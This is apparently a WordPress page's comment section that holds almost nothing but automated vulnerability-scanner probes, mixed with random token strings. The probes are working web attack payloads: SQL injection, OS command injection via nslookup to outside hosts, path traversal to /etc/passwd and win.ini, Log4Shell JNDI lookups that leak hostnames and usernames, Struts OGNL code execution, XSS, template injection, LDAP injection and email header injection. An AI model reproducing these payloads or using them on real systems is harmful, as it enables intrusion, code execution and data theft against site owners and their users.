3,577 Comments


  2. <<<<<<<<<>>>>


  4. wp-comments-post.php


  5. bjrmwo


  6. “>


  8. hetjjs


  10. drhink


  11. “> alert(201);


  16. &(nslookup hityyrrusvvxqb0d09.bxss.me||perl -e “gethostbyname(‘hityyrrusvvxqb0d09.bxss.me’)”)&’\”`0&(nslookup hityyrrusvvxqb0d09.bxss.me||perl -e “gethostbyname(‘hityyrrusvvxqb0d09.bxss.me’)”)&`’


  20. “.gethostbyname(lc(“hitka”.”weqtyear28efc.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(119).chr(74).chr(115).chr(82).”


  29. 0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z


  32. Hi there!


  33. 2K8qtFNUcSFhxVvM6OXvPUqUuaT


  34. 2L2BAOfnwa2Uo1xbzoefm8IfQwg


  35. 2L5xLydmn4JEJ86s5yrrENaKRO0


  37. 2LFF2xh9ky6RqMrR6FvLfYNdaeC


  38. 2Lgz8IJr3SYnl3O3x1F707ZozBq


  39. 2LjSVKzHJBQtbe9z9aFKYmfQxdA


  40. alert(203)


  42. ../../../../../../../etc


  44. ../../../../../../../../etc/passwdindex.html


  46. ADw-script AD4-alert(202) ADw-/script AD4-


  48. ../../../../../../../../etc


  50. /etc


  52. Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAo=


  54. /etc/passwd


  56. ../../../../../../../../etc/passwd


  58. ../../../../../../../etc/passwd


  60. `/etc/passwd`


  67. 1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))


  69. ../../../../../../../../etc/passwd.html


  73. 2PhwWIhL1gO1Z794FQvQUDTINCv


  79. q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA


  81. ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//9af7fca2de302740572275936c4e4897739ed7bc.14706605443848574.1474183457.log4j08.log4j.us3.qualysperiscope.com./QualysWAS}


  83. 2QUa3HC36gDw7jJNOsStyjnh0DP


  84. 2RcmwUVB3ENVOn0YERqjigLpULt


  90. 1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/


  91. 2S4b5NrzKyF16FBucf6qRE3W6Ec


  92. 2SOtLCQf5YsB0yFC2RBAurCgT6e


  93. 2T2eOmMwTeJEhWHCSo52oKoTv6J


  98. 2TV8NwOynrmhvnHPtwjYhtql84l


  99. 2UAOw0aKM3ynDZHxhQeRjQnVmKQ


  100. 2UIxVvj0nCJxaZUflSzuJzYxqXC


  102. <script src=http://localhost/j


  107. 2UYNmo6Kj6cK2ddNc7p3HKYOnRG


  108. 2UzR8lQjvFLtRVlbPZUHIommDDg


  113. 2Wgm2LU6Ax3yGqMx82MZVSpoElC


  115. q
    Qualys_resp_hdr_injection: Vulnerable


  116. ‘;(function(){qxss6j33izva});/**/’


  118. 2XakeK9ZpXYgAOGpGpDfUW4Fn6R


  119. 2YRWccNRcaeOav79r0d7Lf3U8vN


  124. 2ZXxdhWVjnYioQ7OetGmnYG5yHA


  130. 2adQbaLdRchuIdEjt0NQFB67lPi


  131. 2asp0WTjPnF0r8nSQtD6S3WCG2d


  132. 2bAfWYZkFNFbgye8bYNATdSL9QI


  137. 2cOxJ7iun0ujGFXpi0WrvefQjN7


  144. “;(function(){qxssnViIPyOQ});/**/”


  149. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}


  158. 2iJwQs1JGejganszd8CRLNqmYeH


  159. 2hwK81rrm7SwZMtWw7yZZ3CpbRw


  166. 2iM7QSveKM6T0aFAFH4Ad4F3NL5


  168. QualysWAS${“150898”.toString().replace(“8”, “7”)}QualysWAS


  171. ‘;(function(){qxss1e09V4KI});/**/’


  175. */;(function(){qxssJiUCwO74});/*


  179. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ugyve;]>’),’/l’) from dual)


  180. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ugyve;]>’),’/l’) from dual)||’


  181. SUGRYQ;declare @q varchar(99);set @q=’\\68cknylwb16domusqy18708ljcp5dv1mrajx9ly.oasti’+’fy.com\dgg’; exec master.dbo.xp_dirtree @q;–


  182. SUGRYQ’;declare @q varchar(99);set @q=’\\osk27g5evjqv84eaaglqris33u9nxdl4cs4fu3j.oasti’+’fy.com\wny’; exec master.dbo.xp_dirtree @q;–


  183. SUGRYQ);declare @q varchar(99);set @q=’\\p3t3ihgf6k1wj5pblhwr2j34evko8ew5otgg64v.oasti’+’fy.com\jrg’; exec master.dbo.xp_dirtree @q;–


  184. SUGRYQ’);declare @q varchar(99);set @q=’\\ecusr6p4f9alsuy0u65gb8ctnktdh35uyiq5gt5.oasti’+’fy.com\cha’; exec master.dbo.xp_dirtree @q;–


  185. (select load_file(‘\\\\mwm0be9czhutc2i8eepovgw17sdl1bp2rqjd91y.oastify.com\\obe’))


  186. SUGRYQ’+(select load_file(‘\\\\cwcqb492z7ujcsiye4pev6wr7idb11pssgk3arz.oastify.com\\zsl’))+’


  189. SUGRYQ'(select*from(select(sleep(20)))a)’


  190. SUGRYQ+(select*from(select(sleep(20)))a)+


  191. SUGRYQ’+(select*from(select(sleep(20)))a)+’


  192. SUGRYQ and (select*from(select(sleep(20)))a)–


  193. SUGRYQ’ and (select*from(select(sleep(20)))a)–


  194. SUGRYQ,(select*from(select(sleep(20)))a)


  196. SUGRYQ’ waitfor delay’0:0:20′–


  198. SUGRYQ’)waitfor delay’0:0:20′–


  199. SUGRYQ,0)waitfor delay’0:0:20′–


  200. SUGRYQ’,0)waitfor delay’0:0:20′–


  211. SUGRYQ84110990′ or ‘7997’=’7997


  212. SUGRYQ28077701′ or ‘7637’=’7646


  213. SUGRYQ17385880′ or ‘1830’=’1830


  214. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ypsbn;]>’),’/l’) from dual)


  215. SUGRYQ16194558′ or ‘4903’=’4903′


  216. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ypsbn;]>’),’/l’) from dual)||’


  218. ;declare @q varchar(99);set @q=’\\bwbpb391z6uicrixe3pdv5wq7hda17pyfm79xxm.oasti’+’fy.com\vle’; exec master.dbo.xp_dirtree @q;–


  220. ‘;declare @q varchar(99);set @q=’\\jsfx7b59veqq8ze5abllrdsy3p9ixfl6cu4hu5j.oasti’+’fy.com\xai’; exec master.dbo.xp_dirtree @q;–


  222. );declare @q varchar(99);set @q=’\\2figuussixd9vi1oxu84ewfhq8w1ky8p0ds0io7.oasti’+’fy.com\gvq’; exec master.dbo.xp_dirtree @q;–


  224. ‘);declare @q varchar(99);set @q=’\\4lqi0wyuozjb1k7q3we6kyljwa23q0er7fz2pqe.oasti’+’fy.com\uwt’; exec master.dbo.xp_dirtree @q;–


  226. (select load_file(‘\\\\8bkmq0oye39froxut04aa2bnmes7g44v6jy6oud.oastify.com\\sqp’))


  228. ‘+(select load_file(‘\\\\zehdtrrphuc6uf0lwr71dteep5vyjv7maa2xslh.oastify.com\\suw’))+’


  233. ‘(select*from(select(sleep(20)))a)’


  235. ‘+(select*from(select(sleep(20)))a)+’


  236. ‘ and (select*from(select(sleep(20)))a)–


  238. ,(select*from(select(sleep(20)))a)


  239. ‘ waitfor delay’0:0:20’–


  240. ‘)waitfor delay’0:0:20’–


  242. ‘,0)waitfor delay’0:0:20’–


  243. ‘||pg_sleep(20)–


  244. ‘ AND pg_sleep(20)–


  246. ‘,”||pg_sleep(20)–


  247. ‘)AND pg_sleep(20)–


  248. ‘,0)AND pg_sleep(20)–


  250. 96031430′ or ‘1227’=’1227


  252. 47670585′ or ‘1821’=’1822


  253. 11309869′ or ‘4360’=’4360


  255. 88310481′ or ‘2317’=’2317′


  257. 82024227′ or 2613=2613–


  259. 10428732′ or 9562=9567–


  260. SUGRYQcgpkd%3cscript%3ealert%281%29%3c%2fscript%3eukhg6


  261. 85485123′ or 3153=3153–


  263. 58535973′ or 9024=9024′–


  264. SUGRYQyuz8c%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ezfqor


  265. ‘ and ‘7818’=’7818


  266. ‘ and ‘5984’=’5992


  268. ‘ and ‘6739’=’6739


  270. ‘ and ‘2438’=’2438′


  272. ‘ and 7458=7458–


  274. ‘ and 1142=1148–


  276. ‘ and 8268=8268–


  278. ‘ and 8031=8031’–


  282. 9guur79kw0


  285. alert(1)


  289. ol4y5alert(1)dcp4b


  291. ol4y5%3cscript%3ealert%281%29%3c%2fscript%3edcp4b


  293. d1wokalert(1)y2sm8


  296. d1wok%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ey2sm8


  300. SUGRYQ’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’


  301. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  303. yd72v%3ca%20b%3dc%3eesf75


  306. f7pgg${525*357}awmf1


  308. fbfdu{{477*300}}aoslg


  310. trnk8#{859*552}pgnjz


  312. wunas[[322*658]]hp8jt


  313. k3vc0${file.separator}uk7ej


  315. kbz54%{710*959}y638v


  317. d03b0{{683|add:926}}t8acl


  319. #set ($a=350*763) ee7z8${a}wcn7o


  320. ej0ufsv4wr


  322. lp4g6
    = 197*393


  323. xqrb5p3ntso46dcj8pjzprqc137wvmje76uwil.oastify.com


  324. xqiav{{.}}te4ww{{..}}mehi8


  326. gf4qk__${341*811}__uo1ck


  327. }}ibs0j’/”<iehny


  328. nslookup -q=cname hk5vz9x7ncio0x6329djjbkwvn1gp6dzgn8ayyn.oastify.com.&


  329. %}oglop’/”<xm4fb


  330. SUGRYQ|nslookup -q=cname 8y7md0by13wfeokug0rax2yn9ef73xrtfl2bq0.oastify.com.&


  331. f8ogq%>q220o’/”<rrh8k


  332. SUGRYQ'”`0&nslookup -q=cname d4irj5h3782kktqzm5xf374sfjlc92xzlr8hw6.oastify.com.&`’


  333. ‘+sleep(20.to_i)+’


  334. SUGRYQ&nslookup -q=cname f1htg7e54azmhvn1j7uh091uclie64uzir5ht6.oastify.com.&’\”`0&nslookup -q=cname f1htg7e54azmhvn1j7uh091uclie64uzir5ht6.oastify.com.&`’


  335. ‘+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’


  336. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  337. ‘.sleep(20).’


  338. SUGRYQ|echo qqdny3f6br n5bzmr29qb||a #’ |echo qqdny3f6br n5bzmr29qb||a #|” |echo qqdny3f6br n5bzmr29qb||a #


  339. {${sleep(20)}}


  341. SUGRYQ”|echo 76eg68xax6 izokana2g1 ||


  342. 85yhu9i4rn87gy320llo


  343. SUGRYQ’|echo x6x8n2a32b xpcw1i6a13 #xzwx


  344. SUGRYQ|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  346. 81em2on9w4%41fg8fy4g8iw


  350. liwrrtt3eh\\l7tagguti2


  351. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  353. ../../../../../../../../../../../../../../../../windows/win.ini


  354. l6h6nngk4sApwqgx1gmw5


  355. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  356. ../../../../../../../../../../../../../../../../winnt/win.ini


  359. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  360. zord3r1prum64fal6rh1ntoez55ytvhn5fs5gu.oastify.com


  361. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  362. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  365. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  366. SUGRYQ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  367. SUGRYQ../../../../../../../../../../../../../../../../windows/win.ini


  368. SUGRYQ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  369. nslookup -q=cname gtdu8866wbrn9wf2b8misatv4mafycm5pthg74w.oastify.com.&


  370. SUGRYQ../../../../../../../../../../../../../../../../winnt/win.ini


  371. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniSUGRYQ


  373. |nslookup -q=cname 01zegseq4vz7hgnmjsu20u1fc6iz6wusik5atz.oastify.com.&


  374. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniSUGRYQ


  375. ../../../../../../../../../../../../../../../../etc/passwd


  377. ‘”`0&nslookup -q=cname tif7xlvjlog0y94f0lbvhni8tzzsnpbmzem4at.oastify.com.&`’


  379. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  381. &nslookup -q=cname rsn57j5hvmqy87edajltrls63x9qxnli9aw0kp.oastify.com.&’\”`0&nslookup -q=cname rsn57j5hvmqy87edajltrls63x9qxnli9aw0kp.oastify.com.&`’


  382. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  383. SUGRYQ../../../../../../../../../../../../../../../../etc/passwd


  384. ../../../../../../../../../../../../../../../../etc/passwdSUGRYQ


  385. |echo zh6pozjzd4 irnr1y3xnq||a #’ |echo zh6pozjzd4 irnr1y3xnq||a #|” |echo zh6pozjzd4 irnr1y3xnq||a #


  387. &echo dj4nzwyn3a 955voiabk9&


  389. “|echo rbn9auieke n03orgfnoa ||


  391. ‘|echo awyjq40ulr b56jzdtiou #xzwx


  392. |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  394. |ping -c 21 127.0.0.1||x


  397. &ping -n 21 127.0.0.1&


  399. ‘|ping -c 21 127.0.0.1 #


  401. “|ping -n 21 127.0.0.1 ||


  404. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  406. c:\windows\win.ini


  408. ../../../../../../../../../../../../../../../../windows/win.ini


  409. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  411. ../../../../../../../../../../../../../../../../winnt/win.ini


  413. \windows\win.ini


  415. file:///c:/windows/win.ini


  417. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  419. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  421. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  424. windowswin.ini


  425. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  429. ../../../../../../../../../../../../../../../../etc/passwd


  430. SUGRYQ’+(function(){if(typeof t6qse===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);t6qse=1;}}())+'


  432. file:///etc/passwd


  433. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  434. etcpasswd


  435. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  436. SUGRYQ
    BCC:2org3u1srxm94iao6uh4nwohz851trhja72usih@oastify.com
    okz: m


  437. SUGRYQ>
    BCC:fi1tx7v5lagmyv4107bhh9iutlzen4bw5kx7nvc@oastify.com
    ifx: k


  438. …/


  441. ././


  443. ${jndi:ldap://q.qf9690g5fgee58529rdrac25iwoqje8.oastify.com:99999/s2test}


  444. fhf/


  445. ${jndi:ldap://h${hostName}.2svimcthssrqikiem3q3nofhv812xqm.oastify.com:99999/s2test}


  446. ./wp-comments-post.php


  447. ${jndi:ldap://u${hostName}-s2u-${env:USERNAME:-${env:USER}}.1rthlbsgrrqphjhdl2p2mnegu701xpm.oastify.com:99999/s2test}


  448. …/wp-comments-post.php


  449. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  450. pph/wp-comments-post.php


  451. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  452. ././wp-comments-post.php


  453. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  454. /./wp-comments-post.php


  455. /…/wp-comments-post.php


  456. /gmc/wp-comments-post.php


  458. /././wp-comments-post.php


  460. sh79yqjzgn)(objectClass=*


  461. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  462. 5mg4iheg74)(!(objectClass=*)


  464. dygy0jheov)(!(!(objectClass=*))


  466. sbdz52of3s)(!(!(!(objectClass=*)))


  468. *)(objectClass=*


  470. *)(!(objectClass=*)


  472. *)(!(!(objectClass=*))


  474. *)(!(!(!(objectClass=*)))


  478. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  482. ]]>><


  485. ‘+(function(){if(typeof cq2f1===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);cq2f1=1;}}())+'


  486. fetch(‘https://d9ninkx0ujzl1ghbww0jglmgz75xtm.oastify.com’)


  488. “–>’–>`–>


  494. BCC:hh2vw9u7kcfoxx33z9ajgbhwsnygmda53tvgl4a@oastify.com
    suw: v


  496. >
    BCC:2org3u1srxm94iao6uh4nwohz851tyhqbe31tpi@oastify.com
    ayg: x


  499. O:3:”PDO”:0:{}


  501. TzozOiJQRE8iOjA6e30=


  502. %E5%98%8A%E5%98%8DX-Injection:%20test


  503. ${jndi:ldap://q.vqpbk5raqlpjgdg7kwowlhdat1zvxjm.oastify.com:99999/s2test}


  504. ${jndi:ldap://h${hostName}.a5gqzk6p504yvsvmzb3b0wsp8geady2.oastify.com:99999/s2test}


  506. ${jndi:ldap://u${hostName}-s2u-${env:USERNAME:-${env:USER}}.c4hsym5r4230uuuoyd2dzyrr7idcd02.oastify.com:99999/s2test}


  508. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  510. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  512. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  513. SUGRYQ LOAD CSV FROM ‘https://1AdFYSkE.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  514. SUGRYQ’ LOAD CSV FROM ‘https://3scCr13R.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  515. SUGRYQ})LOAD CSV FROM ‘https://yL1dscCF.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  516. file://\/\/etc/passwd


  517. SUGRYQ’ LOAD CSV FROM ‘https://huw8OyiL.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE ‘3’=’3


  518. %2fetc%2fpasswd


  519. SUGRYQ’})LOAD CSV FROM ‘https://MbqkH5kO.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  520. SUGRYQ” LOAD CSV FROM ‘https://WN2dJKCc.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  521. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  522. SUGRYQ”})LOAD CSV FROM ‘https://bDANe8m0.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  523. {!xmlparser v=’‘}


  524. SUGRYQ” LOAD CSV FROM ‘https://3BqzWGQz.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE “3”=”3


  525. ../../../../WEB-INF/web.xml


  526. SUGRYQ”})LOAD CSV FROM ‘https://myQJHB38.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:”3


  527. ../../../WEB-INF/web.xml


  528. SUGRYQ})LOAD CSV FROM ‘https://rZ829tyJ.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  529. ../../WEB-INF/web.xml


  530. SUGRYQ’})LOAD CSV FROM ‘https://KxIUAlCm.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:’3


  531. ../WEB-INF/web.xml


  532. SUGRYQ LOAD CSV FROM ‘https://agcVNlwI.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  533. %c0%ae/WEB-INF/web.xml


  534. SUGRYQ$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  535. %c0%ae/%c0%ae/WEB-INF/web.xml


  536. SUGRYQ%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  537. %c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  538. SUGRYQ|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  539. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  541. ../../../WEB-INF/web.xml;x=


  542. ../../WEB-INF/web.xml;x=


  544. ../WEB-INF/web.xml;x=


  546. WEB-INF/web.xml


  548. .//WEB-INF/web.xml


  550. fetch(‘https://mtjcqi0bxn82lws5dszod2k3lurkf9.oastify.com’)


  569. %E5%98%8A%E5%98%8DX-Injection:%20test


  574. “})LOAD CSV FROM ‘https://uALeq3aZ.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:”3


  575. })LOAD CSV FROM ‘https://BHceM2by.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  576. LOAD CSV FROM ‘https://hXuCfJSS.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  578. “})LOAD CSV FROM ‘https://5LC7qmKs.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  579. ‘ LOAD CSV FROM ‘https://CNuwiBPx.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  580. ‘})LOAD CSV FROM ‘https://Q1mP2vYj.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z{w:’3


  582. ” LOAD CSV FROM ‘https://kn9v2flw.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  583. LOAD CSV FROM ‘https://E8NPBy9q.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  584. })LOAD CSV FROM ‘https://nJ6QIJvn.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl


  586. ‘ LOAD CSV FROM ‘https://xb8gL8lM.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE ‘3’=’3


  587. ” LOAD CSV FROM ‘https://agF7TXv4.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl MATCH(:Z) WHERE “3”=”3


  588. ‘})LOAD CSV FROM ‘https://O7TNo7W2.mlby6bydas8i7m9m3zgdkvpaq1wrkg.oastify.com’ as yl//


  590. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  591. %26zq=x%3c%61%60%27%22%24%7b%7b%5c


  592. |zqy=x%3c%61%60%27%22%24%7b%7b%5c


  594. j24gr97`z’z”${{%{{\


  595. t90sege7\z`z’z”${{%{{\


  596. uperwpzd4


  858. r3v5ijgh6m1yj7pdljwt2l36exkq8gw8owgj67v


  859. oum29g7exjsva4gacgnqtiu35ubnzkncf07nxbm


  861. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ggbbq;]>’),’/l’) from dual)


  862. (select extractvalue(xmltype(‘<!DOCTYPE root [ %kevye;]>’),’/l’) from dual)


  863. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ggbbq;]>’),’/l’) from dual)||’


  864. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %kevye;]>’),’/l’) from dual)||’


  865. SUGRYQ;declare @q varchar(99);set @q=’\\ik6wzax8ndip0y642adkjckxvo1hp7dy3mv9lxa.oasti’+’fy.com\egp’; exec master.dbo.xp_dirtree @q;–


  866. ;declare @q varchar(99);set @q=’\\sa66pknidn8zq8wesk3u9ma7lyrrfo3ft3lqbe0.oasti’+’fy.com\ebw’; exec master.dbo.xp_dirtree @q;–


  867. SUGRYQ’;declare @q varchar(99);set @q=’\\darrp5n3d88kqtwzs53f97asljrcf23tuhm4cs1.oasti’+’fy.com\jtw’; exec master.dbo.xp_dirtree @q;–


  868. ‘;declare @q varchar(99);set @q=’\\4afipwnudz8bqkwqsw369yajlar3f03rufm2cq1.oasti’+’fy.com\daq’; exec master.dbo.xp_dirtree @q;–


  869. SUGRYQ);declare @q varchar(99);set @q=’\\ji5xxbv9legqyz450bblhdiytpzin8bz3nvalya.oasti’+’fy.com\adt’; exec master.dbo.xp_dirtree @q;–


  870. );declare @q varchar(99);set @q=’\\0wxebs9qzvu7cgimesp2vuwf76dz1wpnhb9yzmo.oasti’+’fy.com\ann’; exec master.dbo.xp_dirtree @q;–


  871. SUGRYQ’);declare @q varchar(99);set @q=’\\929nh1fz540gipovk1vb132odfj87yvpodg06ov.oasti’+’fy.com\tgm’; exec master.dbo.xp_dirtree @q;–


  872. ‘);declare @q varchar(99);set @q=’\\zlod0rypouj61f7l3re1ktlew52yqvem7azxple.oasti’+’fy.com\hfm’; exec master.dbo.xp_dirtree @q;–


  873. (select load_file(‘\\\\9w6nb19zz4ugcpive1pbv3wo7fd81ypprdj09oy.oastify.com\\mqo’))


  874. (select load_file(‘\\\\d6krl5j3984kmtszo5zf576shjncb9z01otbjz8.oastify.com\\ltb’))


  875. SUGRYQ’+(select load_file(‘\\\\4tyi8w6uwzrb9kfqbwm6sytj4aa3ytmkp8hv7jw.oastify.com\\ify’))+’


  876. ‘+(select load_file(‘\\\\h5nvk9i78c3olxr3n9yj4b5wgnmgady41stfj38.oastify.com\\oos’))+’


  877. 30742581′ or ‘8472’=’8472


  878. 56089034′ or ‘9525’=’9532


  879. SUGRYQ56223652′ or ‘8886’=’8886


  880. 96044833′ or 2747=2747–


  881. SUGRYQ34907284′ or ‘3261’=’3268


  882. 56158192′ or 4226=4232–


  884. ‘ and ‘2086’=’2086


  886. ‘ and ‘9203’=’9210


  888. ‘ and 8843=8843–


  890. ‘ and 7923=7928–


  893. x7tj21y2j7


  896. (select extractvalue(xmltype(‘<!DOCTYPE root [ %zplkh;]>’),’/l’) from dual)


  897. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %zplkh;]>’),’/l’) from dual)||’


  898. ;declare @q varchar(99);set @q=’\\0ijexsvqlvg7yg4m0sb2huift6zznwbn1btyjm8.oasti’+’fy.com\six’; exec master.dbo.xp_dirtree @q;–


  899. (select extractvalue(xmltype(‘<!DOCTYPE root [ %inarz;]>’),’/l’) from dual)


  900. ‘;declare @q varchar(99);set @q=’\\gtdu8866wbrn9wf2b8misatv4mafycm3dr5ev2k.oasti’+’fy.com\opp’; exec master.dbo.xp_dirtree @q;–


  901. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %inarz;]>’),’/l’) from dual)||’


  902. );declare @q varchar(99);set @q=’\\bq5p5331t6oi6rcx83jdp5qq1h7av7jybm39txi.oasti’+’fy.com\nvx’; exec master.dbo.xp_dirtree @q;–


  903. SUGRYQ;declare @q varchar(99);set @q=’\\y65clqjo9t45meskoqz05s6dh4nxbnzep2hp7dw.oasti’+’fy.com\wos’; exec master.dbo.xp_dirtree @q;–


  904. ‘);declare @q varchar(99);set @q=’\\4sxi7w5uvzqb8keqawl6rysj3a93x0lref62wql.oasti’+’fy.com\qwr’; exec master.dbo.xp_dirtree @q;–


  905. SUGRYQ’;declare @q varchar(99);set @q=’\\uqo85m3ktpo16acg8mjwpoq9107tvjjaay2ls9h.oasti’+’fy.com\nhj’; exec master.dbo.xp_dirtree @q;–


  906. (select load_file(‘\\\\5ouj3x1vr0mc4lar6xh7nzokzb54t1hsjgb31rq.oastify.com\\fuc’))


  907. SUGRYQ);declare @q varchar(99);set @q=’\\roj53j1hrmmy47ad6jhtnlo6zx5qtgh79v1ir6g.oasti’+’fy.com\wnk’; exec master.dbo.xp_dirtree @q;–


  908. ‘+(select load_file(‘\\\\1gifvttrjwe8wh2nyt93fvggr7x0lx9occ4zunj.oastify.com\\rih’))+’


